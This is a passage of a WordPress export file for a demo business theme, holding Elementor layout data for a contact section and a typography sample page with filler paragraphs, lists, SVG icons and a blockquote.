24\/7","header_size":"h6","des":"+1-800-456-478-23","link":{"url":"tel:+1-800-456-478-23","is_external":"","nofollow":"","custom_attributes":""},"is_line":"","hover_icon_shadow_box_shadow_type":"yes","hover_icon_shadow_box_shadow":{"horizontal":0,"vertical":0,"blur":0,"spread":0,"color":""},"icon_space":{"unit":"px","size":76,"sizes":[]},"icon_size":{"unit":"px","size":22,"sizes":[]},"icon_bg_width":{"unit":"px","size":60,"sizes":[]},"radius_box":{"unit":"%","top":"50","right":"50","bottom":"50","left":"50","isLinked":true},"icon_bg":"#FFF3E9","icon_shadow_box_shadow_type":"yes","icon_shadow_box_shadow":{"horizontal":0,"vertical":0,"blur":0,"spread":0,"color":""},"title_space_top":{"unit":"px","size":6,"sizes":[]},"title_space_bottom":{"unit":"px","size":1,"sizes":[]},"title_typography_typography":"custom","title_typography_font_size":{"unit":"px","size":16,"sizes":[]},"title_typography_font_weight":"600","_padding":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"iiconbox2"},{"id":"f3cf3dd","elType":"widget","settings":{"icon_font":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/send.svg","id":374},"library":"svg"},"title":"Mail Us","header_size":"h6","des":"maxbizz@mail.com","link":{"url":"mailto: maxbizz@mail.com","is_external":"","nofollow":"","custom_attributes":""},"is_line":"","hover_icon_shadow_box_shadow_type":"yes","hover_icon_shadow_box_shadow":{"horizontal":0,"vertical":0,"blur":0,"spread":0,"color":""},"icon_space":{"unit":"px","size":76,"sizes":[]},"icon_size":{"unit":"px","size":24,"sizes":[]},"icon_bg_width":{"unit":"px","size":60,"sizes":[]},"radius_box":{"unit":"%","top":"50","right":"50","bottom":"50","left":"50","isLinked":true},"icon_bg":"#FFF3E9","icon_shadow_box_shadow_type":"yes","icon_shadow_box_shadow":{"horizontal":0,"vertical":0,"blur":0,"spread":0,"color":""},"title_space_top":{"unit":"px","size":6,"sizes":[]},"title_space_bottom":{"unit":"px","size":1,"sizes":[]},"title_typography_typography":"custom","title_typography_font_size":{"unit":"px","size":16,"sizes":[]},"title_typography_font_weight":"600"},"elements":[],"widgetType":"iiconbox2"}],"isInner":false},{"id":"89ca7e2","elType":"column","settings":{"_column_size":66,"_inline_size":56.66499999999999914734871708787977695465087890625,"_inline_size_tablet":100},"elements":[{"id":"4fb28a7","elType":"widget","settings":{"image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/image-contacts.png","id":465},"image_size":"full","_margin":{"unit":"px","top":"-46","right":"-120","bottom":"0","left":"-70","isLinked":false},"_margin_tablet":{"unit":"px","top":"0","right":"0","bottom":"0","left":"0","isLinked":false}},"elements":[],"widgetType":"image"}],"isInner":false}],"isInner":false},{"id":"a5be57a","elType":"section","settings":{"margin":{"unit":"px","top":"-245","right":0,"bottom":"0","left":0,"isLinked":false},"margin_tablet":{"unit":"px","top":"-100","right":0,"bottom":"0","left":0,"isLinked":false},"margin_mobile":{"unit":"px","top":"-10","right":0,"bottom":"50","left":0,"isLinked":false},"z_index":1},"elements":[{"id":"574fa46","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"12e32dc","elType":"widget","settings":{"cf7":"4","_padding":{"unit":"px","top":"60","right":"60","bottom":"60","left":"60","isLinked":true},"_padding_mobile":{"unit":"px","top":"50","right":"20","bottom":"50","left":"20","isLinked":false},"_background_background":"classic","_background_color":"#FFFFFF","_border_radius":{"unit":"px","top":"5","right":"5","bottom":"5","left":"5","isLinked":true},"_box_shadow_box_shadow_type":"yes","_box_shadow_box_shadow":{"horizontal":0,"vertical":0,"blur":30,"spread":0,"color":"rgba(0, 0, 0, 0.12)"}},"elements":[],"widgetType":"ictf7"}],"isInner":false}],"isInner":false},{"id":"de4c36a","elType":"section","settings":{"layout":"full_width","margin":{"unit":"px","top":"-60","right":0,"bottom":"0","left":0,"isLinked":false},"margin_tablet":{"unit":"px","top":"","right":0,"bottom":"","left":0,"isLinked":true},"margin_mobile":{"unit":"px","top":"0","right":0,"bottom":"0","left":0,"isLinked":false}},"elements":[{"id":"f31c287","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"3e66202","elType":"widget","settings":{"address":"411 University St, Seattle, USA","height":{"unit":"px","size":520,"sizes":[]},"css_filters_css_filter":"custom","css_filters_saturate":{"unit":"px","size":0,"sizes":[]}},"elements":[],"widgetType":"google_maps"}],"isInner":false}],"isInner":false}]]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_controls_usage]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:8:{s:8:"iheading";a:3:{s:5:"count";i:1;s:15:"control_percent";i:2;s:8:"controls";a:3:{s:7:"content";a:1:{s:15:"content_section";a:3:{s:3:"sub";i:1;s:5:"title";i:1;s:11:"header_size";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:8:"_padding";i:1;}}s:5:"style";a:1:{s:13:"style_section";a:1:{s:14:"subtitle_style";i:1;}}}}s:11:"text-editor";a:3:{s:5:"count";i:1;s:15:"control_percent";i:1;s:8:"controls";a:2:{s:7:"content";a:1:{s:14:"section_editor";a:1:{s:6:"editor";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:8:"_padding";i:1;}}}}s:9:"iiconbox2";a:3:{s:5:"count";i:3;s:15:"control_percent";i:6;s:8:"controls";a:3:{s:7:"content";a:1:{s:15:"content_section";a:5:{s:9:"icon_font";i:3;s:5:"title";i:3;s:11:"header_size";i:3;s:3:"des";i:3;s:4:"link";i:3;}}s:5:"style";a:3:{s:17:"style_box_section";a:2:{s:7:"is_line";i:3;s:7:"icon_bg";i:3;}s:18:"style_icon_section";a:6:{s:10:"icon_space";i:3;s:9:"icon_size";i:3;s:13:"icon_bg_width";i:3;s:10:"radius_box";i:3;s:27:"icon_shadow_box_shadow_type";i:3;s:22:"icon_shadow_box_shadow";i:3;}s:21:"style_content_section";a:5:{s:15:"title_space_top";i:3;s:18:"title_space_bottom";i:3;s:27:"title_typography_typography";i:3;s:26:"title_typography_font_size";i:3;s:28:"title_typography_font_weight";i:3;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:8:"_padding";i:2;}}}}s:6:"column";a:3:{s:5:"count";i:4;s:15:"control_percent";i:0;s:8:"controls";a:2:{s:6:"layout";a:1:{s:6:"layout";a:2:{s:12:"_inline_size";i:4;s:19:"_inline_size_tablet";i:2;}}s:8:"advanced";a:1:{s:16:"section_advanced";a:2:{s:13:"margin_tablet";i:1;s:13:"margin_mobile";i:1;}}}}s:5:"image";a:3:{s:5:"count";i:1;s:15:"control_percent";i:2;s:8:"controls";a:2:{s:7:"content";a:1:{s:13:"section_image";a:2:{s:5:"image";i:1;s:10:"image_size";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:2:{s:7:"_margin";i:1;s:14:"_margin_tablet";i:1;}}}}s:7:"section";a:3:{s:5:"count";i:3;s:15:"control_percent";i:1;s:8:"controls";a:2:{s:6:"layout";a:2:{s:14:"section_layout";a:2:{s:3:"gap";i:1;s:6:"layout";i:1;}s:17:"section_structure";a:1:{s:9:"structure";i:1;}}s:8:"advanced";a:1:{s:16:"section_advanced";a:6:{s:7:"padding";i:1;s:14:"padding_mobile";i:1;s:6:"margin";i:2;s:13:"margin_tablet";i:2;s:13:"margin_mobile";i:2;s:7:"z_index";i:1;}}}}s:5:"ictf7";a:3:{s:5:"count";i:1;s:15:"control_percent";i:4;s:8:"controls";a:2:{s:7:"content";a:1:{s:15:"section_content";a:1:{s:3:"cf7";i:1;}}s:8:"advanced";a:3:{s:14:"_section_style";a:2:{s:8:"_padding";i:1;s:15:"_padding_mobile";i:1;}s:19:"_section_background";a:2:{s:22:"_background_background";i:1;s:17:"_background_color";i:1;}s:15:"_section_border";a:3:{s:14:"_border_radius";i:1;s:27:"_box_shadow_box_shadow_type";i:1;s:22:"_box_shadow_box_shadow";i:1;}}}}s:11:"google_maps";a:3:{s:5:"count";i:1;s:15:"control_percent";i:2;s:8:"controls";a:2:{s:7:"content";a:1:{s:11:"section_map";a:2:{s:7:"address";i:1;s:6:"height";i:1;}}s:5:"style";a:1:{s:17:"section_map_style";a:2:{s:22:"css_filters_css_filter";i:1;s:20:"css_filters_saturate";i:1;}}}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>Typography</title>
		<link>http://wpdemo.archiwp.com/maxbizz/typography/</link>
		<pubDate>Mon, 07 Sep 2020 04:22:37 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz/?page_id=471</guid>
		<description></description>
		<content:encoded><![CDATA[<h1>Heading 1</h1>		
		<p>Most firms have set up a war room to triage their immediate response to the crisis. But the lack of visibility around future demand complicates efforts to restart stalled portfolio companies, recapitalize them and plan for a longer-term recovery. Making smart decisions requires coming to a quick understanding of two things: What impact is Covid-19 having on customer demand right now, and what sort of shape will demand take as the economic downturn.</p>		
			<h2>Heading 2</h2>		
		<p>Most firms have set up a war room to triage their immediate response to the crisis. But the lack of visibility around future demand complicates efforts to restart stalled portfolio companies, recapitalize them and plan for a longer-term recovery. Making smart decisions requires coming to a quick understanding of two things: What impact is Covid-19 having on customer demand right now, and what sort of shape will demand take as the economic downturn.</p>		
			<h3>Heading 3</h3>		
		<p>Most firms have set up a war room to triage their immediate response to the crisis. But the lack of visibility around future demand complicates efforts to restart stalled portfolio companies, recapitalize them and plan for a longer-term recovery. Making smart decisions requires coming to a quick understanding of two things: What impact is Covid-19 having on customer demand right now, and what sort of shape will demand take as the economic downturn.</p>		
			<h4>Heading 4</h4>		
		<p>Most firms have set up a war room to triage their immediate response to the crisis. But the lack of visibility around future demand complicates efforts to restart stalled portfolio companies, recapitalize them and plan for a longer-term recovery. Making smart decisions requires coming to a quick understanding of two things: What impact is Covid-19 having on customer demand right now, and what sort of shape will demand take as the economic downturn.</p>		
			<h5>Heading 5</h5>		
		<p>Most firms have set up a war room to triage their immediate response to the crisis. But the lack of visibility around future demand complicates efforts to restart stalled portfolio companies, recapitalize them and plan for a longer-term recovery. Making smart decisions requires coming to a quick understanding of two things: What impact is Covid-19 having on customer demand right now, and what sort of shape will demand take as the economic downturn.</p>		
			<h6>Heading 6</h6>		
		<p>Most firms have set up a war room to triage their immediate response to the crisis. But the lack of visibility around future demand complicates efforts to restart stalled portfolio companies, recapitalize them and plan for a longer-term recovery. Making smart decisions requires coming to a quick understanding of two things: What impact is Covid-19 having on customer demand right now, and what sort of shape will demand take as the economic downturn.</p>		
			<h4>IV Columns</h4>		
		<p>A faceting effect livens up and interrupts the cubism that sets the morphology of the West system apart from the cliches.</p><p>A faceting effect livens up and interrupts the cubism that sets the morphology of the West system apart from the cliches.</p><p>A faceting effect livens up and interrupts the cubism that sets the morphology of the West system apart from the cliches.</p><p>A faceting effect livens up and interrupts the cubism that sets the morphology of the West system apart from the cliches.</p>		
			<h4>III Columns</h4>		
		<p>Characterised by its suitability for use in a wide range of different contemporary and traditional arrangements, West also features glints of pure creativity, such as the chaise longue.</p><p>Characterised by its suitability for use in a wide range of different contemporary and traditional arrangements, West also features glints of pure creativity, such as the chaise longue.</p><p>Characterised by its suitability for use in a wide range of different contemporary and traditional arrangements, West also features glints of pure creativity, such as the chaise longue.</p>		
			<h4>II Columns</h4>		
		<p>Characterised by its suitability for use in a wide range of contemporary and traditional arrangements, West also features glints of pure creativity, such as the chaise longue, available in pentagonal or hexagonal form and the elements that stand out for their striking backrests in saddle hide.</p><p>Characterised by its suitability for use in a wide range of contemporary and traditional arrangements, West also features glints of pure creativity, such as the chaise longue, available in pentagonal or hexagonal form and the elements that stand out for their striking backrests in saddle hide.</p>		
			<h4>Text Elements</h4>		
		<p>Three of these curves describe an initial Covid-related spike in demand, and three describe a short-term hit. Where each group begins to diverge, however, is in what’s likely to happen to demand over the next several years. Think, for example, of personal computer monitors or other types of goods that were declining pre-pandemic and fall into the “short-term spike, long-term decline” archetype. The story is different for online grocery shopping and collaboration services like Zoom (short-term spike, long-term growth), both of which were growing steadily before the pandemic. <em>Experimentation during the crisis has convinced more and more customers that ordering or meeting online makes sense, pulling forward demand that will likely stick</em>.</p>		
			<h4>Highlights</h4>		
		<p>Most firms have set up a war room to triage their immediate response to the crisis. But the lack of visibility around future demand complicates efforts to restart stalled portfolio companies, recapitalize them and plan for a longer-term recovery. Making smart decisions requires coming to a quick understanding of two things: What impact is Covid-19 having on customer demand right now, and what sort of shape will demand take as the economic downturn.</p><p>Most firms have set up a war room to triage their immediate response to the crisis. But the lack of visibility around future demand complicates efforts to restart stalled portfolio companies, recapitalize them and plan for a longer-term recovery. Making smart decisions requires coming to a quick understanding of two things: What impact is Covid-19 having on customer demand right now, and what sort of shape will demand take as the economic downturn.</p>		
			<h4>Dropcaps</h4>		
		<p>Most firms have set up a war room to triage their immediate response to the crisis. But the lack of visibility around future demand complicates efforts to restart stalled portfolio companies, recapitalize them and plan for a longer-term recovery. Making smart decisions requires coming to a quick understanding of two things: What impact is Covid-19 having on customer demand right now, and what sort of shape.</p><p>Most firms have set up a war room to triage their immediate response to the crisis. But the lack of visibility around future demand complicates efforts to restart stalled portfolio companies, recapitalize them and plan for a longer-term recovery. Making smart decisions requires coming to a quick understanding of two things: What impact is Covid-19 having on customer demand right now, and what sort of shape.</p>		
			<h4>Listings</h4>		
		<ol><li>Customer Experience</li><li>New Business Innovation</li><li>Sales and Marketing</li></ol><ul><li>Customer Experience</li><li>New Business Innovation</li><li>Sales and Marketing</li></ul>		
					<ul>
							<li>
							<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 490.688 490.688" style="enable-background:new 0 0 490.688 490.688;" xml:space="preserve">
<path style="fill:#FFC107;" d="M472.328,120.529L245.213,347.665L18.098,120.529c-4.237-4.093-10.99-3.975-15.083,0.262  c-3.992,4.134-3.992,10.687,0,14.82l234.667,234.667c4.165,4.164,10.917,4.164,15.083,0l234.667-234.667  c4.237-4.093,4.354-10.845,0.262-15.083c-4.093-4.237-10.845-4.354-15.083-0.262c-0.089,0.086-0.176,0.173-0.262,0.262  L472.328,120.529z"></path>
<path d="M245.213,373.415c-2.831,0.005-5.548-1.115-7.552-3.115L2.994,135.633c-4.093-4.237-3.975-10.99,0.262-15.083  c4.134-3.992,10.687-3.992,14.82,0l227.136,227.115l227.115-227.136c4.093-4.237,10.845-4.354,15.083-0.262  c4.237,4.093,4.354,10.845,0.262,15.083c-0.086,0.089-0.173,0.176-0.262,0.262L252.744,370.279  C250.748,372.281,248.039,373.408,245.213,373.415z"></path>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
</svg>						
										Customer Experience
									</li>
								<li>
							<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 490.688 490.688" style="enable-background:new 0 0 490.688 490.688;" xml:space="preserve">
<path style="fill:#FFC107;" d="M472.328,120.529L245.213,347.665L18.098,120.529c-4.237-4.093-10.99-3.975-15.083,0.262  c-3.992,4.134-3.992,10.687,0,14.82l234.667,234.667c4.165,4.164,10.917,4.164,15.083,0l234.667-234.667  c4.237-4.093,4.354-10.845,0.262-15.083c-4.093-4.237-10.845-4.354-15.083-0.262c-0.089,0.086-0.176,0.173-0.262,0.262  L472.328,120.529z"></path>
<path d="M245.213,373.415c-2.831,0.005-5.548-1.115-7.552-3.115L2.994,135.633c-4.093-4.237-3.975-10.99,0.262-15.083  c4.134-3.992,10.687-3.992,14.82,0l227.136,227.115l227.115-227.136c4.093-4.237,10.845-4.354,15.083-0.262  c4.237,4.093,4.354,10.845,0.262,15.083c-0.086,0.089-0.173,0.176-0.262,0.262L252.744,370.279  C250.748,372.281,248.039,373.408,245.213,373.415z"></path>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
</svg>						
										New Business Innovation
									</li>
								<li>
							<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 490.688 490.688" style="enable-background:new 0 0 490.688 490.688;" xml:space="preserve">
<path style="fill:#FFC107;" d="M472.328,120.529L245.213,347.665L18.098,120.529c-4.237-4.093-10.99-3.975-15.083,0.262  c-3.992,4.134-3.992,10.687,0,14.82l234.667,234.667c4.165,4.164,10.917,4.164,15.083,0l234.667-234.667  c4.237-4.093,4.354-10.845,0.262-15.083c-4.093-4.237-10.845-4.354-15.083-0.262c-0.089,0.086-0.176,0.173-0.262,0.262  L472.328,120.529z"></path>
<path d="M245.213,373.415c-2.831,0.005-5.548-1.115-7.552-3.115L2.994,135.633c-4.093-4.237-3.975-10.99,0.262-15.083  c4.134-3.992,10.687-3.992,14.82,0l227.136,227.115l227.115-227.136c4.093-4.237,10.845-4.354,15.083-0.262  c4.237,4.093,4.354,10.845,0.262,15.083c-0.086,0.089-0.173,0.176-0.262,0.262L252.744,370.279  C250.748,372.281,248.039,373.408,245.213,373.415z"></path>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
</svg>						
										Sales and Marketing
									</li>
						</ul>
					<ul>
							<li>
							<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Layer_1" x="0px" y="0px" viewBox="0 0 492 492" style="enable-background:new 0 0 492 492;" xml:space="preserve">
<g>
	<g>
		<path d="M465.064,207.566l0.028,0H284.436V27.25c0-14.84-12.016-27.248-26.856-27.248h-23.116    c-14.836,0-26.904,12.408-26.904,27.248v180.316H26.908c-14.832,0-26.908,12-26.908,26.844v23.248    c0,14.832,12.072,26.78,26.908,26.78h180.656v180.968c0,14.832,12.064,26.592,26.904,26.592h23.116    c14.84,0,26.856-11.764,26.856-26.592V284.438h180.624c14.84,0,26.936-11.952,26.936-26.78V234.41    C492,219.566,479.904,207.566,465.064,207.566z"></path>
	</g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
</svg>						
										Customer Experience
									</li>
								<li>
							<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Layer_1" x="0px" y="0px" viewBox="0 0 492 492" style="enable-background:new 0 0 492 492;" xml:space="preserve">
<g>
	<g>
		<path d="M465.064,207.566l0.028,0H284.436V27.25c0-14.84-12.016-27.248-26.856-27.248h-23.116    c-14.836,0-26.904,12.408-26.904,27.248v180.316H26.908c-14.832,0-26.908,12-26.908,26.844v23.248    c0,14.832,12.072,26.78,26.908,26.78h180.656v180.968c0,14.832,12.064,26.592,26.904,26.592h23.116    c14.84,0,26.856-11.764,26.856-26.592V284.438h180.624c14.84,0,26.936-11.952,26.936-26.78V234.41    C492,219.566,479.904,207.566,465.064,207.566z"></path>
	</g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
</svg>						
										New Business Innovation
									</li>
								<li>
							<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Layer_1" x="0px" y="0px" viewBox="0 0 492 492" style="enable-background:new 0 0 492 492;" xml:space="preserve">
<g>
	<g>
		<path d="M465.064,207.566l0.028,0H284.436V27.25c0-14.84-12.016-27.248-26.856-27.248h-23.116    c-14.836,0-26.904,12.408-26.904,27.248v180.316H26.908c-14.832,0-26.908,12-26.908,26.844v23.248    c0,14.832,12.072,26.78,26.908,26.78h180.656v180.968c0,14.832,12.064,26.592,26.904,26.592h23.116    c14.84,0,26.856-11.764,26.856-26.592V284.438h180.624c14.84,0,26.936-11.952,26.936-26.78V234.41    C492,219.566,479.904,207.566,465.064,207.566z"></path>
	</g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
</svg>						
										Sales and Marketing
									</li>
						</ul>
			<h4>Blockquote</h4>		
		<blockquote>“I cannot give you the formula for success, but I can give you the 
formula for failure. It is: Try to please everybody.”
<cite>david oswald</cite></blockquote>]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>471</wp:post_id>
		<wp:post_date><![CDATA[2020-09-07 04:22:37]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-07 04:22:37]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[closed]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[typography]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[page]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
														<wp:postmeta>
		<wp:meta_key><![CDATA[_edit_last]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[page_layout]]></wp:meta_key>
		<wp:meta_value><![CDATA[full-content]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[pheader_switch]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[is_trans]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[slide_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[rs_page_bg_color]]></wp:meta_key>
		<wp:meta_value><![CDATA[#ffffff]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[pheader_bg_image]]></wp:meta_key>
		<wp:meta_value><![CDATA[473]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_edit_mode]]></wp:meta_key>
		<wp:meta_value><![CDATA[builder]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_template_type]]></wp:meta_key>
		<wp:meta_value><![CDATA[wp-page]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_version]]></wp:meta_key>
		<wp:meta_value><![CDATA[3.0.10]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_page_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_data]]></wp:meta_key>
		<wp:meta_value><![CDATA[[{"id":"8a5d04c","elType":"section","settings":{"padding":{"unit":"px","top":"80","right":"0","bottom":"80","left":"0","isLinked":false}},"elements":[{"id":"dc1cfdf","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"3925b8d","elType":"widget","settings":{"title":"Heading 1","header_size":"h1","_padding":{"unit":"px","top":"0","right":"0","bottom":"20","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"9cdb2cf","elType":"widget","settings":{"editor":"<p>Most firms have set up a war room to triage their immediate response to the crisis. But the lack of visibility around future demand complicates efforts to restart stalled portfolio companies, recapitalize them and plan for a longer-term recovery. Making smart decisions requires coming to a quick understanding of two things: What impact is Covid-19 having on customer demand right now, and what sort of shape will demand take as the economic downturn.<\/p>","_padding":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"7594742","elType":"widget","settings":{"title":"Heading 2","_padding":{"unit":"px","top":"0","right":"0","bottom":"20","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"4f04e2d","elType":"widget","settings":{"editor":"<p>Most firms have set up a war room to triage their immediate response to the crisis. But the lack of visibility around future demand complicates efforts to restart stalled portfolio companies, recapitalize them and plan for a longer-term recovery. Making smart decisions requires coming to a quick understanding of two things: What impact is Covid-19 having on customer demand right now, and what sort of shape will demand take as the economic downturn.<\/p>","_padding":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"552d935","elType":"widget","settings":{"title":"Heading 3","header_size":"h3","_padding":{"unit":"px","top":"0","right":"0","bottom":"20","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"eb0c1c1","elType":"widget","settings":{"editor":"<p>Most firms have set up a war room to triage their immediate response to the crisis. But the lack of visibility around future demand complicates efforts to restart stalled portfolio companies, recapitalize them and plan for a longer-term recovery. Making smart decisions requires coming to a quick understanding of two things: What impact is Covid-19 having on customer demand right now, and what sort of shape will demand take as the economic downturn.<\/p>","_padding":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"7a7b273","elType":"widget","settings":{"title":"Heading 4","header_size":"h4","_padding":{"unit":"px","top":"0","right":"0","bottom":"20","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"3cce58e","elType":"widget","settings":{"editor":"<p>Most firms have set up a war room to triage their immediate response to the crisis. But the lack of visibility around future demand complicates efforts to restart stalled portfolio companies, recapitalize them and plan for a longer-term recovery. Making smart decisions requires coming to a quick understanding of two things: What impact is Covid-19 having on customer demand right now, and what sort of shape will demand take as the economic downturn.<\/p>","_padding":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"3d16c16","elType":"widget","settings":{"title":"Heading 5","header_size":"h5","_padding":{"unit":"px","top":"0","right":"0","bottom":"20","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"1782a00","elType":"widget","settings":{"editor":"<p>Most firms have set up a war room to triage their immediate response to the crisis. But the lack of visibility around future demand complicates efforts to restart stalled portfolio companies, recapitalize them and plan for a longer-term recovery. Making smart decisions requires coming to a quick understanding of two things: What impact is Covid-19 having on customer demand right now, and what sort of shape will demand take as the economic downturn.<\/p>","_padding":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"22515c1","elType":"widget","settings":{"title":"Heading 6","header_size":"h6","_padding":{"unit":"px","top":"0","right":"0","bottom":"20","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"aa2835e","elType":"widget","settings":{"editor":"<p>Most firms have set up a war room to triage their immediate response to the crisis. But the lack of visibility around future demand complicates efforts to restart stalled portfolio companies, recapitalize them and plan for a longer-term recovery. Making smart decisions requires coming to a quick understanding of two things: What impact is Covid-19 having on customer demand right now, and what sort of shape will demand take as the economic downturn.<\/p>","_padding":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"10","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"0e2eb3b","elType":"widget","settings":{"text":"Divider","color":"#0000001A","gap":{"unit":"px","size":35,"sizes":[]},"_padding":{"unit":"px","top":"0","right":"0","bottom":"50","left":"0","isLinked":false},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"20","left":"0","isLinked":false}},"elements":[],"widgetType":"divider"},{"id":"4555825","elType":"widget","settings":{"title":"IV Columns","header_size":"h4","_padding":{"unit":"px","top":"0","right":"0","bottom":"25","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"e1bd3b8","elType":"section","settings":{"gap":"extended","structure":"40","padding":{"unit":"px","top":"0","right":"0","bottom":"45","left":"0","isLinked":false},"layout":"full_width"},"elements":[{"id":"7359c5a","elType":"column","settings":{"_column_size":25,"_inline_size":null},"elements":[{"id":"f199e08","elType":"widget","settings":{"editor":"<p>A faceting effect livens up and interrupts the cubism that sets the morphology of the West system apart from the cliches.<\/p>"},"elements":[],"widgetType":"text-editor"}],"isInner":true},{"id":"6eacc12","elType":"column","settings":{"_column_size":25,"_inline_size":null},"elements":[{"id":"bc73054","elType":"widget","settings":{"editor":"<p>A faceting effect livens up and interrupts the cubism that sets the morphology of the West system apart from the cliches.<\/p>"},"elements":[],"widgetType":"text-editor"}],"isInner":true},{"id":"2b7bef0","elType":"column","settings":{"_column_size":25,"_inline_size":null},"elements":[{"id":"8e362cb","elType":"widget","settings":{"editor":"<p>A faceting effect livens up and interrupts the cubism that sets the morphology of the West system apart from the 